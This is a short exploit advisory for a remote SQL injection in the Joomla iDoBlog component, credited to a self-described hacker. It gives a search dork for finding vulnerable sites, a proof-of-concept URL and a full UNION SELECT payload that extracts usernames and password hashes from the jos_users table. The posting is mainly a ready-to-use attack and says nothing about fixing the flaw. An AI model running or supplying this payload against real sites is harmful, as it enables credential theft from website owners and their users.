The Joomla iDoBlog component versions b24 and below suffer from a remote SQL injection vulnerability.
685f74f5c202274edc28d1641d5e4009ee4c472231558922a2c7a019dc3536b2
#########################################################
# #
# Joomla Component idoblog Remote SQL Injection #
# #
#########################################################
########################################
[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Contact: His0k4.hlm[at]gmail.com
[*] Greetz : All friends & muslims HaCkeRs :)
[*] Greetz2 : http://www.palcastle.org/cc/
########################################
[*] Script_Name: "Joomla"
[*] Component_Name: "com_idoblog"
########################################
[*] DORK: inurl:com_idoblog
########################################
[*] P.O.C : /index.php?option=com_idoblog&task=userblog&userid={SQL}
[*] Example: /index.php?option=com_idoblog&task=userblog&userid=<valid_userid> and 1=1 UNION SELECT user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
########################################